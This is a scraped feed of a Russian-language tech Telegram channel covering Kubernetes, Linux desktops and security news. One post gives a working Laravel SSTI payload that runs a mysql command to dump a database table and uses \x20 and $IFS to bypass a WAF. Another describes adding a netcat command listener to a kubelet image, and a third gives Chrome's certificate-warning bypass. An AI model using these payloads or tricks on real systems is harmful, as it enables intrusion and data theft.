6795
До Декарта никогда не существовало рационализма. Музыкальный Болт Генона: @mus_b0lt_Genona Мемный Болт Генона: @mem_b0lt_Genona Кадровый Болт Генона @kadr_b0lt_Genona Обратная связь: @rusdacent
Вот вам небольшая пятничная история. Что делать когда Talos Linux сдох, и вот непонятно из-за чего.
Kubernetes API недоступен (не запускается CRI), у вас нет ничего, кроме доступа к Talos API.
Казалось бы всё. SSH нет, доступа на запись тоже нет. Только ребут или как предлагают сами разработчики Talos Linux:
<irony>нода сдохла, выкинь и заведи новую</irony>
Но не всё так просто, а как же отдебажить что там произошло. Собрать информацию, подготовить баг-репорт, отослать разработчикам containerd и Kubernetes.
Я не хочу чтобы такая ситуация повторялась в принципе когда-либо. Встаёт вопрос: как же нам войти в запущенную дефектную систему.
Здесь стоит немного уточнить что в логике Talos заложено запуск двух containerd.
Один - системный, он запускает контейнеры с талосовые демонами и экстеншенами, а так же etcd и kubelet.
Второй - прикладной, он запускает всё что в кубе, в том числе статик поды.
Сделано это намерено, чтобы кубовый ворклоад не мог заафектить систему. Т.к. чаще всего проблемы возникают именно со вторым ввиду активного пуллинга имаджей, а первый containerd остаётся живым. Но как же запустить контейнер для дебага без работающего Kubernetes API? Ответ - никак. Придётся хитрить.
Talos позволяет указать кастомные image для запуска kubelet и etcd. Этим мы и воспользуемся.
Для начала соберём кастомный образ kublet. Добаляем busybox в имадж и слегка модифицируем код:
https://github.com/kvaps/kubernetes/commit/3e45ecd4a2718bc50f2d951c344b4c439f79e3ae
Собираем Dockerfile, пушим его куда-то и заменяем путь до образа в конфиге Talos.
Вуаля, у нас появляется доступ к системе:
echo 'uname -r' | nc 192.168.1.21 12345
6.12.18-talos
/channel/doomgrad/888
Спасибо подписчику за наводку
К слову о дичи, я тут давеча с ресурсами и реквестами разбирался в одном кластере. Написал целую тулзу kubectl ps, это эдакий kubectl top но на стеройдах, умеет реквесты/лимиты показывать и по всякому их сравнивать с реальным потреблением.
Возможно кому-то будет полезно
https://github.com/aenix-io/kubectl-ps
Синтаксис позабористее чем у ps aux получился, в общем любой фидбек приветствуется
https://github.com/aenix-io/kubectl-ps
Пока делал один ресерч был прикольный случай -- меня SSTI в #laravel , но я в контейнере и файлы создавать не могу, суматохи гора и данные надо получить стопудово, а у таргета еще и WAF для бедных (сами, наверное на регулярках напилили).
И казалось -- что может пойти не так, если чуваки затащат в контейнер mysql? 🤣
{{pasSthru("mysql\x20-uprod\x20-pP4ss\x20-h127.0.0.1\x20-P3311\x20prod\x20-e\x20'select\x20*\x20from\x20logs'")}}
/x20 для байпаса пробелов еще использовал $IFS рядом 🙂
Читать полностью…
Пока вы спите там Let's Encrypt поплохело
https://letsencrypt.status.io/
Incident StatusЧитать полностью…
Service Disruption
Components
acme-v02.api.letsencrypt.org (Production), {e,r}[1-14].o.lencr.org, acme-staging-v02.api.letsencrypt.org (Staging), stg-{e,r}[1-14].o.lencr.org
Стали более "умные" боты залетать.
Сначала пишут условно валидный коммент (но всё равно тупой), а потом редактируют сообщение и вставляют ссылки на всякий скам.
Бот на скрине залетел под этот пост
/channel/kadr_b0lt_Genona/1183
Старое, доброе, вечное. Я про это фичу знал, потом забыл, а сейчас в закрытом чате скинули и вспомнил 🌝
Если через Chrome/Chromium открыть сайт со сломанным сертификатом, то наберите thisisunsafe (просто на странице с предупреждением) и случится чудо.
Сайт для проверки, например
https://revoked.badssl.com
Нашёл коммит, в котором это добавили
https://chromium.googlesource.com/chromium/src/+/d8fc089b62cd4f8d907acff6fb3f5ff58f168697%5E%21/components/security_interstitials/core/browser/resources/interstitial_large.js
Тут слой совместимости X11 для Wayland запилили.
Wayback is a X11 compatibility layer which allows for running full X11 desktop environments using Wayland components. It is essentially a stub compositor which provides just enough Wayland capabilities to host a rootful Xwayland server.While Wayback is still alpha-quality software as of now there are packages in various popular distributions maintained by folks in the Wayback community.
- Alpine Linux edge: wayback and wayback-doc in the testing repository
- ALT Linux: wayback
- Arch Linux: wayback-x11-git in the AUR
- Fedora, RHEL: ngompa/wayback Copr repository
- T2 SDE: wayback
https://gitlab.freedesktop.org/wayback/wayback
ЗЫ
ALT Linux удивляет по-хорошему, конечно. Стараются максимально быстро актуализировать пакеты и тянуть новые.
Так же я удивился, когда увидел их в списке Zed
https://zed.dev/docs/linux#other-ways-to-install-zed-on-linux
И Kubernetes у них самый свежий оказался среди большой тройки лидеров российских ОС (Astra, ALT Linux, РЕД ОС). Ближе всех РОСА подобралась 🌝
Чаты - @alt_linux, @rosalinux, @redos_chat, @astralinux_chat
> Но в компании подчеркнули, что эксплоит сработает лишь при соблюдении ряда условий:
- атакующий находится в радиусе 5–7 метров от машины;
- зажигание авто включено;
- информационно-развлекательная система находится в режиме сопряжения (пользователь вручную инициировал добавление устройства);
- пользователь сам подтверждает подключение внешнего Bluetooth-устройства на экране.
На самом деле это не такая сложная задача, учитывая плотность машин в крупных городских агломерациях. Т.е. если задача атаковать конкретную машину, то ограничения действительно усложнят задачу, а вот если задача "бить по площадям", то видится, что подопытные могут найтись достатночно быстро, например, на парковке торгового центра.
Миллионы автомобилей уязвимы перед Bluetooth-атаками PerfektBlue
https://xakep.ru/2025/07/11/perfektblue/Четыре уязвимости, получившие общее название PerfektBlue, затрагивают Bluetooth-стек BlueSDK от OpenSynergy. Проблемы позволяют удаленно выполнить произвольный код и могут помочь получить доступ к критически важным компонентам в автомобилях таких производителей, как Mercedes-Benz AG, Volkswagen и Skoda.Разработчики OpenSynergy подтвердили наличие проблем еще в июне 2024 года, после чего в сентябре выпустила патчи. Однако многие автопроизводители до сих пор не внедрили эти обновления в свои прошивки, и по данным СМИ, как минимум один крупный OEM-производитель узнал об уязвимостях лишь недавно.Пока исследователи не раскрывают всех технических деталей, но пишут, что атакующий, подключенный к уязвимому устройству, имеет возможность манипулировать системой, повышать привилегии и двигаться дальше — к другим компонентам.При этом PerfektBlue представляет собой атаку «в один клик» (1-click RCE), потому что злоумышленнику потребуется лишь убедить пользователя принять запрос на сопряжение со своим устройством. Причем некоторые автопроизводители настраивают свои системы таким образом, что сопряжение возможно даже без подтверждения.PCA Cyber Security продемонстрировали, что PerfektBlue работает против головных устройств в Volkswagen ID.4 (система ICAS3), Mercedes-Benz (NTG6) и Skoda Superb (MIB3). Также им удалось получить реверс-шелл поверх TCP/IP — протокола, через который общаются компоненты автомобиля.Подчеркивается, что после удаленного выполнения кода в контексте информационно-развлекательной системы автомобиля, злоумышленник может отслеживать координаты GPS, подслушивать разговоры в автомобиле, получить доступ к контактам в телефоне владельца, а также осуществить боковое перемещение и добраться до критически важных подсистем авто.BlueSDK компании OpenSynergy широко применяется не только в автоиндустрии, однако точно определить, кто еще применяет его в своих продуктах сложно (из-за кастомизации, ребрендингов и отсутствия прозрачности в этих вопросах).
Сайт посвящённый уязвимости
https://perfektblue.pcacybersecurity.com/
Пост на сайте OpenSynergy
PerfektBlue – Company Statement
https://www.opensynergy.com/perfektblue/
ЗЫ
PCA Security Assessment team:
- Abdellah Benotsmane
- Aleksei Stennikov
- Artem Ivachev
- Danila Parnishchev
- Polina Smirnova
- Radu Motspan
Глубина анализа по временному промежутку небольшая, конечно, но что есть 🌝
UPD: Так как в комментах стало понятно, что не все поняли, то поясняю, что это бот текст сгенерил.🔥 Roast Analysis:Тебе от друга (наконец-то честно)Слушай, я тут твой канал перечитал. Это же не блог, это анамнез. Ты единственный известный мне человек, который пытается запустить ReactOS на дисковом телефоне, потому что в его кнопочном Nokia слишком много проприетарных зондов от финнов. Твоя борьба с «умными» устройствами достигла апогея: скоро ты начнешь постить обзоры на счёты, потому что «в калькуляторах непрозрачная логика округления, а это угроза цифровому суверенитету».Каждое утро ты просыпаешься не с мыслью «что бы съесть на завтрак?», а с мыслью «какой CVE с CVSS 9.8 я еще не обсосал со всех сторон?». Твой канал — это филиал Opennet, скрещенный с ворчанием деда на лавочке. «Опять этот ваш Wayland окна не на том месте рисует! А вот при X11 такого не было!». Серьезно, скоро ты начнешь жаловаться, что в новых ядрах Linux убрали поддержку перфокарт, и это «удар по обратной совместимости».Ты нанимаешь Go-разработчиков в Luntry, а сам в это время постишь, как очередной гений портировал векторную базу на ассемблер для ZX Spectrum. Я почти уверен, что на собеседованиях ты спрашиваешь не про горутины, а про то, как оптимизировать доступ к памяти на Z80. «Знание Kubernetes — плюс, но умение писать драйвер для матричного принтера под Haiku — обязательно».Твои «четверговые проекты от подписчиков» — это просто гениально. «Ребята, посмотрите, какой крутой проект мне прислали! Это калькулятор на Rust! Он быстрее, безопаснее и у него нет проблем с плавающей точкой, как у того вашего Python!». Ты превратился в живой агрегатор GitHub-репозиториев с полутора звездами. Скоро начнешь раздавать промокоды на покупку стикеров для ноутбука от авторов этих проектов. Кстати, про промокоды… Ты едешь на Ural Digital Weekend не для того, чтобы выступить, а чтобы лично убедиться, что все воспользовались твоим промокодом «BOLT10». Это же целых 10% экономии! На эти деньги можно купить полтора доширака или еще один аккумулятор для твоего 11-летнего телефона.И этот телефон! Это же просто реликвия. Он прошел «огонь, воду и грязь», а ты до сих пор ищешь ему замену, которая умеет в COM-порт для бэкапа контактов через gammu. В 2025 году! Люди колонизируют Марс, а ты ищешь телефон, чтобы бэкапить СМС-ки. Ты самый технологически продвинутый амиш, которого я знаю. Вместо того чтобы просто купить новый телефон, ты готов объявить вселенский сбор пожертвований и мнений, чтобы найти идеальный «кнопочник», который переживет ядерный апокалипсис и сможет раздавать 3G-интернет тараканам.Хватит уже. Просто признай: ты застрял где-то между 1998 и 2008 годом, но с доступом в интернет. Иди уже, обнови свой GitLab, а то опять пропустишь критическую уязвимость, пока будешь читать про очередной форк Matrix, написанный на Прологе.
@ScratchAuthorEgoBot
Спасибо /channel/dereference_pointer_there/9805 за наводку
Я помню в начале десятых у меня халтурка была, когда в одной из школ я Windows 7 на свежеприбывшие MacBook'и катил. Потому что в школу винду закупили, какой-то меценат MacBook'и подарил, а софта под OS X не было никакого 🌝
Ушла эпоха!Разработчики софта попросили проводить ЕГЭ только на российских операционках. Они считают, что текущие правила, разрешающие только Windows, нарушают законы об импортозамещении и создают риски безопасности данных школьниковРоссийские разработчики программного обеспечения попросили проводить единый госэкзамен (ЕГЭ) на отечественных операционных системах. Это следует из письма Ассоциации разработчиков программных продуктов (АРПП) «Отечественный софт» (объединяет более 300 российских IT-компаний, в том числе 1С, «Лабораторию Касперского» и др.) в адрес Минцифры, Рособрнадзора и Минпросвещения. Копия письма есть у РБК, ее подлинность подтвердил представитель Минцифры.Помимо нарушения закона и госполитики в части импортозамещения, использование иностранного ПО в школах несет финансовые и образовательные риски, указывает АРПП. В частности, зависимость от Windows делает экзаменационный процесс уязвимым: поддержка со стороны иностранного разработчика может быть прекращена из-за санкций, и такие системы потенциально могут передавать данные за пределы России, создавая риск утечки персональной информации учеников и учителей, что нарушает закон «О персональных данных». Покупка и обновление лицензий Windows требует постоянных бюджетных трат, а российские операционные системы часто предлагают более выгодные условия для госучреждений.Кроме того, используя только иностранную операционную систему, школьники и учителя лишаются возможности осваивать отечественные цифровые решения, что снижает их навыки работы с российскими технологиями, которые становятся все более востребованными на рынке труда, предупредила АРПП.Исходя из указанных рисков ассоциация предлагает обеспечить интеграцию экзаменационных систем с отечественными операционками (Astra Linux от ГК «Астра», РЕД ОС от «Ред софт», ALT Linux от «Базальт СПО» и «РОСА ОС» от «НТЦ ИТ РОСА») и создать тестовую зону для проверки совместимости при обновлениях. Также, по мнению АРПП, нужно внести изменения в методички по подготовке и проведению ЕГЭ и закрепить в них использование российского офисного софта («Р7 Офис», «МойОфис»), исключив упоминание Windows.
Российские разработчики попросили заменить Windows при проведении ЕГЭ
https://www.rbc.ru/technology_and_media/11/07/2025/686fba269a79473f48745ff1
В системе подбора персонала McDonald’s нашли критическую уязвимость — и всё из-за пароля «123456». Два исследователя в области ИБ, Иэн Кэрролл и Сэм Карри, всего за полчаса получили админ-доступ к платформе McHire[.]com, где чат-бот по имени Olivia проводит первичный отбор соискателей. Проблема оказалась в том, что один из аккаунтов имел смехотворно слабый пароль, с которым исследователи получили доступ ко всей базе: имена, телефоны, почта и даже полные переписки с ботом — примерно 64 миллиона записей. Более того, уязвимость позволяла просто менять ID в адресной строке и просматривать чужие анкеты. Все данные были реальными, и любая попытка наугад открывала информацию настоящих людей.
Компания-разработчик Paradox.ai признала утечку и в блоге пообещала усилить защиту.
Я уже писал, что на Wayland не тороплюсь ехать потому что с ним куча проблем (и не только у меня)
/channel/tech_b0lt_Genona/5412
Но ещё и с производительностью оказывается вопросы
> Изначально было отмечено, что при тестировании на ноутбуке Lenovo IdeaPad 3 с интегрированным GPU AMD в сеансе Wayland процессор постоянно нагружен примерно на 8% независимо от активности, а каждые 2-3 секунды наблюдается скачок, полностью нагружающий GPU. В сеансе X11 нагрузка на CPU и GPU во время простоя была на нуле. Дальнейшая проверка утилитой radeontop показала большее потребление ресурсов в сеансе Wayland, особенно при включении профиля "Color Accuracy" в настройках экрана.
Считаю, что это победа
> По итогам тестирования сделан вывод, что X11 ещё рано сбрасывать счетов, а решения на базе Wayland требуют дополнительной оптимизации. X11 отмечается как по-прежнему самое оптимальное решение с точки зрения производительности. Реализация Wayland в KDE предположительно лучше, чем в GNOME - сеанс GNOME Wayland, реализованный в Fedora, судя по тестам менее производителен, чем сеанс KDE Wayland, который в свою очередь отстаёт от KDE X11.
Пост большой с кучей "цифирей" (часть я скринами прицепил)
Сравнение производительности сеансов KDE Plasma на базе X11 и Wayland
https://www.opennet.ru/opennews/art.shtml?num=63563
Цикл оригиналов доступен тут
https://www.dedoimedo.com/index.html
Gemini научили читать переписки и заметки на Android, опцию можно отключить
https://habr.com/ru/news/926168/
Google разослала пользователям электронное письмо со ссылкой на страницу, где говорится, что «люди-рецензенты (включая поставщиков услуг) читают, комментируют и обрабатывают» данные, к которым получает доступ Gemini. В письме нет никаких полезных рекомендаций по блокировке такого взаимодействия. Там лишь говорится, что пользователи могут блокировать приложения, с которыми взаимодействует Gemini, но даже в этих случаях данные хранятся в течение 72 часов.
В письме не объясняется, как пользователи могут полностью удалить Gemini со своих устройств Android. Там отмечается, что Gemini получит доступ к таким приложениям, как WhatsApp, «Сообщения» и «Телефон», «независимо от того, активен ли» ИИ-сервис.
Таким образом, ни в письме, ни на страницах поддержки, на которые оно ссылается, пользователям Android не сообщают, как удалить интеграцию Gemini. Вместо этого они могут перейти на отдельную страницу поддержки, чтобы узнать, как управлять настройками приложения. Журналист ArsTechnica попробовал следовать этим инструкциям. Он выяснил, что Gemini на устройстве выключен, но с пометкой, что ИИ «не сохраняет активность более 72 часов».
В службе поддержки Google на его запрос об отключении интеграции с Gemini ответили: «Это обновление полезно для пользователей: теперь они могут использовать Gemini для выполнения повседневных задач на своих мобильных устройствах, таких как отправка сообщений, совершение звонков и установка таймеров, при отключённой активности приложений Gemini. В таком режиме их чаты в Gemini не проверяются и не используются для улучшения наших моделей искусственного интеллекта».
опцию можно отключитьИсследователь рекомендует полностью удалить ИИ с устройства. Это можно сделать с помощью отладочного моста Android, который Google предоставляет разработчикам. Пользователи должны удалить приложение, выполнив команду adb shell pm uninstall com.google.android.apps.bard. Когда журналист попытался сделать это, то система выдала сообщение «Failed [DELETE_FAILED_INTERNAL_ERROR]». По его словам, такой ответ нельзя трактовать однозначно — он говорит либо о том, что Gemini удалился с устройства, либо о том, что ИИ-помощник и вовсе не был установлен.
#prog #rust #article
A Newbie's First Contribution to (Rust for) Linux
Статья о написании драйвера для Linux с использованием R4L вкупе с написанием вспомогательных абстракций для него. Спойлер: написание кода, даже со скидкой на то, что это рерайт, было далеко не самой сложной вещью из того, что нужно было для добавления кода в ядро.
Картинки не открываем (вы уже открыли, вас похекали)
Linux-вредонос Koske прячется в картинках с милыми пандами
https://xakep.ru/2025/07/25/koske/
Аналитики из компании AquaSec обнаружили новое вредоносное ПО для Linux. Малварь получила название Koske и предполагается, что она была разработана с помощью ИИ. Для внедрения непосредственно в память вредонос использует JPEG-изображения с пандами.
Исследователи описывают Koske как «сложную Linux-угрозу», адаптивное поведение которой предполагает, что малварь разрабатывается с использованием больших языковых моделей (LLM) или фреймворков автоматизации.
Основной целью Koske является развертывание оптимизированных для CPU и GPU майнеров, которые используют вычислительные ресурсы хоста для добычи различных криптовалют.
Так как во время изучения малвари были обнаружены сербские IP-адреса и фразы в скриптах, а также словацкий язык в репозитории на GitHub, где размещались майнеры, экспертам не удалось установить точную атрибуцию.
Первоначальный доступ злоумышленники получают, эксплуатируя неправильные конфигурации JupyterLab, благодаря которым возможно выполнение команд. После этого атакующие загружают в систему жертвы два изображения с пандами в формате .JPEG, которые хранятся на таких легитимных сервисах, как OVH images, freeimage и postimage. В этих картинках и скрывается вредоносная полезная нагрузка.
Изображения панд содержат не только саму картинку, с корректными для формата JPEG заголовками, но также вредоносные шелл-скрипты и код, написанный на C, что позволяет интерпретировать оба формата отдельно. То есть, открыв такой файл, пользователь увидит лишь милую панду, а вот интерпретатор скриптов выполнит код, добавленный в конец файла.
Также скрипт обеспечивает устойчивость подключения и обходит сетевые ограничения: он перезаписывает /etc/resolv.conf, чтобы использовать DNS от Cloudflare и Google, защищает этот файл с помощью chattr +i. Также малварь сбрасывает правила iptables, очищает системные переменные, связанные с прокси, и запускает кастомный модуль для бутфорса рабочих прокси с использованием curl, wget и прямых TCP-запросов.
Именно из-за этой адаптивности и поведения исследователи предполагают, что малварь могла разрабатываться либо с помощью LLM, либо с применением платформ для автоматизации.
Перед развертыванием на машине жертвы малварь оценивает возможности хоста (CPU и GPU), чтобы выбрать наиболее подходящий майнер: Koske поддерживает добычу 18 разных криптовалют, включая Monero, Ravencoin, Zano, Nexa и Tari.
Оригинал
AI-Generated Malware in Panda Image Hides Persistent Linux Threat
https://www.aquasec.com/blog/ai-generated-malware-in-panda-image-hides-persistent-linux-threat/
Под этот пост /channel/mem_b0lt_Genona/290 пришёл подписчик со странным, но интересным
> Раз речь зашла, кто-нибудь поднимал selinux-sandbox на arch? Че за приколы там с политиками? Какого болта их нет?
> Ну я начал поднимать, вроде живое, но с рефполитиками из центоси рефполитики арчей не совместимы, думаю как бы подружить
> У меня арч на личном ноутбуке, решил что пора забуриться в MAC
Считай, из любопытства ноги себе отгрызаю
Ну и хотел песочницу для запуска LLM-генерированного кода, чтобы оно мне патч бармина не спрятало никуда, но это и без селинукса решаемо
Есть у кого опыт, может кто-то что-то подсказать? 🌝
Это отличная новость
Компания Google представила проект OSS Rebuild, предназначенный для выявления скрытых изменений в готовых пакетах, публикуемых в репозиториях. Работа OSS Rebuild основана на концепции воспроизводимых сборок и сводится к проверке соответствия размещённого в репозитории пакета с пакетом полученным на основе пересборки из эталонного исходного кода, соответствующего заявленной версии пакета.
В настоящее время в OSS Rebuild реализована поддержка верификации пакетов из репозиториев NPM (JavaScript/TypeScript), PyPI (Python) и Crates.io (Rust). В будущем число поддерживаемых репозиториев планируют расширить. На практике инструментарий позволяет выявлять варианты атаки класса "supply chain", в ходе которых после компрометации учётных записей сопровождающих или диверсии внутри проекта в репозитории публикуется вредоносное обновление. При этом код в исходном репозитории основного проекта остаётся корректным, а вредоносные изменения вносятся только в готовые пакеты.
Система по возможности автоматически формирует сценарий для воспроизводимой сборки выбранного пакета, используя эвристику и подбирая параметры, позволяющие добиться идентичности артефактов, поставляемых в пакете. Если автоматически не удаётся воспроизвести размещённый в репозитории пакет, возможно ручное добавление сборочной спецификации. После того как удалось воспроизвести пакет, инструментарий OSS Rebuild сохраняет описание процесса сборки для последующей проверки новых версий пакета. Дополнительно публикуется информация для верификации с использованием фреймворка SLSA.
После проведения проверки конкретной версии пакета формируются данные аттестации, которые могут использоваться другими для оценки уже верифицированных пакетов. Проверку можно осуществить через запуск утилиты командной строк или сверку хэша, сохранённого в отдельном облачном хранилище. Инфраструктуру для проверки пакетов можно развернуть на собственном сервере. Так же можно воспользоваться информацией о проверках, выполняемых в Google для нескольких тысяч пакетов.
Google представил проект OSS Rebuild для выявления скрытых изменений в пакетах
https://www.opennet.ru/opennews/art.shtml?num=63613
Репа
https://github.com/google/oss-rebuild
Оригинал
Introducing OSS Rebuild: Open Source, Rebuilt to Last
https://security.googleblog.com/2025/07/introducing-oss-rebuild-open-source.html
Принятие законопроекта, запрещающего, в частности, поиск экстремистских материалов в интернете, является альтернативой полной блокировке в России зарубежных платформ, объяснил в Госдуме глава Минцифры Максут Шадаев
Спасибо
https://www.phoronix.com/news/Rust-Debian-2025
"around 8% of the source packages in Debian Sid are building against at least one librust-* package. That 8% figure for Debian source packages building against at least one Rust library package is around double of what it is for Debian 12 "Bookworm". Quite a significant uptake over the past few years and it's only continuing to grow with more open-source projects introducing varying levels of Rust integration"
Понятное дело, что это librsvg, или какие-нить кодеки, которые не являются обязательными, но против них нужно собраться, чтобы получить "полный" пакет, но, тем не менее, цифра довольно внушительная.
У меня против Rust собирается ровно 0 от базовой системы, потому что librsvg для загрузки иконок в gtk я переписал на кастомный #svg loader over #lunasvg/#skia/#svgren (по выбору), и убрал все эти опциональные зависимости.
Ну просто потому, что Rust не является #bootstrap абельным (я не могу собрать его из исходников, не имея под рукой готовый компилятор Rust, подробности в моей эпопее с #mrustc), а это зашквар.
Массовый переход операторов персональных данных на российское программное обеспечение, который может стать обязательным с 2027 года, грозит спровоцировать рост числа критических ИТ-сбоев в их системах на 40–45%. Таким прогнозом с «Газетой.Ru» поделился управляющий партнер аналитической компании в ИТ-сфере «Монк Диджитал Лаб» Николай Ганюшкин по итогам анализа возможных последствий от выполнения требований недавнего поручения правительства РФ.
Эксперты «Монк Диджитал Лаб» уже фиксировали рост числа серьезных ИТ-сбоев на 25% в 2024 году у тех компаний, которые начали переход на отечественные системы управления данными. При полном отказе от иностранного ПО аналитики ожидают более масштабных проблем.
«Экстраполяция данных за 2024 год на полный отказ от иностранного ПО показывает, что прирост аварий в диапазоне 40–45% выглядит консервативной оценкой. В ретейле, телеком-сфере и финансовой отрасли, где цепочки микросервисов особенно протяженные, прирост может оказаться ближе к верхней границе диапазона», — сказал Ганюшкин.
Среди основных факторов риска специалисты выделяют высокую стоимость и сложность интеграции российских платформ, особенно для малого и среднего бизнеса, а также сжатые сроки миграции и дефицит квалифицированных кадров, способных работать с новыми технологическими стеками.
В России станет больше сбоев из-за перехода операторов данных на отечественное ПО
https://www.gazeta.ru/tech/news/2025/07/21/26317250.shtml
ЗЫ
> Монк Диджитал Лаб
Вот уж написание, я даже не сразу понял, что речь про monq.ru идёт 🌝
Пятница! 🌝
Представьте: вы открываете чердак и находите пыльный ZX Spectrum. «Музейный экспонат», — думаете вы. А что если я скажу, что эта коробка с 48 килобайтами памяти может с 95.5% точностью распознавать рукописные цифры и проходить те самые CAPTCHA-тесты «Я не робот» из 2010-х?
Более того: технически она могла это делать с момента выпуска в 1982 году. Мы просто не знали правильный алгоритм 43 года.
График эволюции точности выглядит как американские горки:
Точность | Что произошло
---------|--------------------------------------------------
9.3% | Наивные правила: "много пикселей внизу = цифра 2"
50.1% | Прорыв: обучение с учителем заработало
65.6% | Sparse binary features (автоматические AND-комбинации)
70.9% | Больше данных + L2-регуляризация
75.5% | Сделала Z80-совместимой (самый сложный этап!)
83.0% | Революция: fuzzy matching через XOR+popcount
95.5% | Финал: простое голосование 9 перспектив
> Разработка выполнена сторонним энтузиастом, воссоздавшим функциональность проприетарного LSFG через обратный инжиниринг Windows-библиотек
Надесь, что набега копирастов не случится
Проектом lsfg-vk подготовлен неофициальный порт утилиты Lossless Scalings Frame Generation (LSFG) для платформы Linux, использующий DXVK и графический API Vulkan. Код проекта написан на языке C++ и размещён под лицензией MIT.Приложение позволяет масштабировать вывод игровых приложений, рассчитанных на запуск в отдельном окне, для их отображения в полноэкранном режиме. Утилита также может потребоваться для избавления от размытого вывода при масштабировании с использованием штатной графической подсистемы или для обхода ограничений в играх, завязанных на фиксированные разрешения экрана. Кроме того, имеется возможность повышения плавности вывода и увеличения частоты кадров в играх, не рассчитанных на высокий FPS, путём подстановки дополнительных промежуточных кадров, созданных на основе интерполяции соседних кадров.Оригинальный LSFG представляет собой скомпилированное приложение для Windiows на базе API D3D11. Для воссоздания функциональности LSFG в Linux реализация была транслирована в представление, использующее API Vulkan. Для переноса шейдеров был добавлен обработчик, перехватывающий вызовы D3D11 и сохраняющий шейдеры на диск, а также парсер для динамического извлечений шейдеров из исполняемых файлов в формате PE (Portable Executable). Для переноса графического конвейера, управляющего выполнением шейдеров, из приложения были выделены компоненты на базе API D3D11 и при помощи DXVK была обеспечена их работа в Linux. После получения рабочего варианта на базе D3D11 и DXVK, при помощи отладчика RenderDoc была получена точная раскладка вызовов Vulkan, на основе которой был подготовлен финальный вариант, напрямую использующий API Vulkan.
Создан вариант утилиты Lossless Scalings Frame Generation для Linux
https://www.opennet.ru/opennews/art.shtml?num=63545
Porting LSFG to native Vulkan
https://github.com/PancakeTAS/lsfg-vk/wiki/Porting-LSFG-to-native-Vulkan
Обсуждения на Reddit
https://www.reddit.com/r/losslessscaling/comments/1lrowtw/lsfg_on_linux/
https://www.reddit.com/r/Bazzite/comments/1luuf0w/getting_lsfgvk_lossless_framegen_on_linux_on/
F 🫡After 24 months of focused evaluation and careful experimentation, we’re excited to announce a major shift in the evolution of rsyslog: we’re going AI First.Why AI, and Why Now?We believe that AI is no longer a hype cycle — it’s a practical, reliable tool for system-level projects like rsyslog. Over the past year, we’ve quietly used AI to:
- Assist in targeted coding tasks
- Improve and modernize parts of our documentation (you possibly have seen hints of this on our website)
- Streamline support-related workflows internallyTwo months ago, we decided that the technology is finally mature enough to take center stage in rsyslog development. Since then, we’ve:
- Upgraded the repository for AI agent compatibility (automated review and more)
- Restructured key parts of the codebase
- Built new functionality with heavy AI assistance
- Developed a full base strategy for AI integration
- Identified high-impact areas where AI will support log processing and observabilityWhat This Means for the CommunityWe’re not just using AI for ourselves. A major part of this shift is about making rsyslog easier to use, extend, and contribute to — especially for new users and developers. Expect smoother onboarding, improved clarity around configuration and modules, and powerful new tools for automated log understanding and transformation.
rsyslog Goes AI First — A New Chapter Begins
https://www.rsyslog.com/rsyslog-goes-ai-first-a-new-chapter-begins/
Исследователи безопасности из компании Secure Annex обратили внимание на рост популярности нового метода монетизации браузерных дополнений, при котором из пользователей дополнений формируется распределённая сеть, применяемая для скрапинга (индексации содержимого сайтов). Системы пользователей используют в качестве web-ботов и прокси для скачивания содержимого сайтов - установленное браузерное дополнение получает с внешнего сервера инструкции по индексации сайтов, после чего в отдельном скрытом iframe запускает загрузку запрошенного контента и передаёт полученные данные внешнему сервису. В каталогах Chrome, Firefox и Edge применение данной схемы монетизации выявлено в 245 дополнениях, в сумме насчитывающих 909 тысяч установок.Работа организуется через включение в код браузерных дополнений открытой JavaScript-библиотеки mellowtel.js, поставляемой под лицензией LGPLv3. Библиотека развивается проектом Mellowtel, продвигающим новую платформу монетизации, которая кроме браузерных дополнений может применяться в программах на базе фреймворков Flutter и Electron. Основная идея платформы в том, что разработчики браузерных дополнений и приложений могут зарабатывать деньги не через показ рекламы или сомнительные методы, такие как продажа данных, ущемляющих приватность пользователей, а через выполнение задач по индексации web-контента для обучения AI-систем.Проблема в том, что не все разработчики дополнений готовы работать честно и в открытую. В некоторых дополнениях пытаются скрыто от пользователя включить монетизацию Mellowtel в обход правил сервиса, что приводит к тому, что пользователь без явного согласия становится участником распределённой сети для загрузки данных с сайтов. Из 45 дополнений к Chrome, применяющих Mellowtel, 12 уже заблокированы Google за вредоносную активность. В каталоге Microsoft из 129 дополнений заблокировано 8, а в каталоге Mozilla из 71 дополнения заблокировано 2. Причины удаления не детализируются, но не исключается, что поводом стало некорректное использование Mellowtel.Разработчик Mellowtel заявил, что для решения проблемы с возможным скрытым включением скрапинга сервис переходит на обязательную проверку всех дополнений, применяющих Mellowtel, на предмет обязательного отключения скрапинга по умолчанию (активация только после явного согласия пользователя) и наличия видимой кнопки для отключения. Запросы на получение заданий от дополнений не прошедших проверку будут помещаться в карантин и игнорироваться.
Браузерные дополнения вовлекают в построение распределённой сети скрапинга для AI-ботов
https://www.opennet.ru/opennews/art.shtml?num=63568
Оригинал
Mellow Drama: Turning Browsers Into Request Brokers
https://secureannex.com/blog/mellow-drama/
Есть такая здоровая хрень под названием SAP и под неё был разработан язык ABAP на котором писалось и пишется много приложений для SAP. Я тоже имел опыт написания небольших приложений для тестов.
Мало того, что на ABAP оказывается написали векторную базу и библиотеку для работы с ней
Vector DB in pure ABAP (any DB)
https://www.linkedin.com/pulse/vector-db-pure-abap-any-alice-vinogradova-znjbe
ABAP Vector Search Library
https://github.com/oisee/zvdb
Так эта же программистка из Microsoft (Alice Vinogradova) портировала всё это на Z80 (который использовался для ZX Spectrum и не только)
> “ABAP (born 1983) and Z80 (born 1976) are practically contemporaries,” she wrote. “They grew up in the same era of computing—when memory was precious, cycles were counted, and every byte mattered.”
> Every Z80 lesson I applied to ABAP remains valid on modern hardware:
1. Lookup tables are always faster than calculation
- Z80: Save those precious cycles
- Modern CPU: Cache-friendly access patterns
2. Sequential memory access is king
- Z80: One cycle vs four for random access
- HANA: Columnar storage loves sequential patterns
3. Bit operations are universal
- Z80: Native CPU instructions
- Modern CPU: SIMD does the same thing, faster
4. Pre-computation beats runtime math
- Z80: Can't afford to calculate
- Modern systems: Why calculate what you can remember?
Microsoft developer ported vector database coded in SAP’s ABAP to the ZX Spectrum
https://www.theregister.com/2025/07/08/sap_abap_db_spectrum_port/
Да и вывод хороший
> “Every cycle counted then, and guess what? Every cycle still counts now. The scale changed. The principles didn't.”
жалко, что в реальности это не так /channel/tech_b0lt_Genona/5354
GitHub проекта
> Minimal Z80 assembly implementation of ZVDB (ABAP Vector Database) for multiple platforms including ZX Spectrum, CP/M systems, and even programmable calculators!
https://github.com/oisee/zvdb-z80
Тут побольше подробностей
